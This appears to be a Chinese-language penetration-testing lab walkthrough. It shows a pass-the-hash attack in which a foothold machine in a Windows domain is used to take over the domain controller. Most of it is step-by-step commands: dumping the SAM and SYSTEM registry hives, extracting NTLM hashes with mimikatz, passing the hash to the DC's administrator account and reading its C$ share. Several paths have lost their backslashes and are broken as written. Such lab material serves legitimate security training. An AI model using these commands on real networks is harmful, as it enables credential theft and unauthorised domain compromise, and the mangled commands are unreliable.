实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了域内一普通用户win_server2012实验步骤
1,将mimikatz上传至win_server2012;
2,cd 至mimikatz目录;
3,使用reg命令,将注册表中HKLM下的 SAM与 SYSTEM键值导出保存至 sam.hive和 system.hive
reg save hklmsam sam.hive reg save hklmsystem system.hive
4,使用mimikatz读取 .hive 注册表文件,以获取本地用户的NTLM hash值;
.mimikatz "lsadump::sam /system:system.hive /sam:sam.hive" exit
5,使用mimikatz进行hash传递攻击:
.mimikatz sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值 例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........
6,攻击成功后,会弹出一个cmd.exe,此时,可以去win2008(DC)的C盘创建一个1.txt,内容为hello world,
回到win2012,进行验证:
1,读取win2008的 C盘以及1.txt内容,注意读取方式 dir \192.168.3.133C$ type \192.168.3.133C$1.txt



